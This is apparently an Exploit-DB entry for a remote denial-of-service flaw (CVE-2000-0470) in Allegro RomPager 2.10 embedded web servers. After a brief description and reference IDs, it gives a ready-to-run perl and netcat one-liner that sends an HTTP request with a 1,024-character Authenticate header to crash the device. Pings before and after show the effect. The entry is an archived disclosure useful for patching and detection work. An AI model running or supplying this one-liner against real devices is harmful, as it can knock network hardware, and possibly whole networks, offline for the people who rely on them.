Allegro RomPager 2.10 - URL Request Denial of Service

EDB-ID:

10237


Author:

netsec

Type:

dos


Platform:

Hardware

Date:

2000-06-01


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

Allegro's RomPager is reported prone to a remote denial of service vulnerability.

If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser. 

CVE : CVE-2000-0470
BID : 1290
Other references : OSVDB:1371
Nessus ID : 19304

The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works

the one-liner:
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80

$ ping $ip_address # doesn't work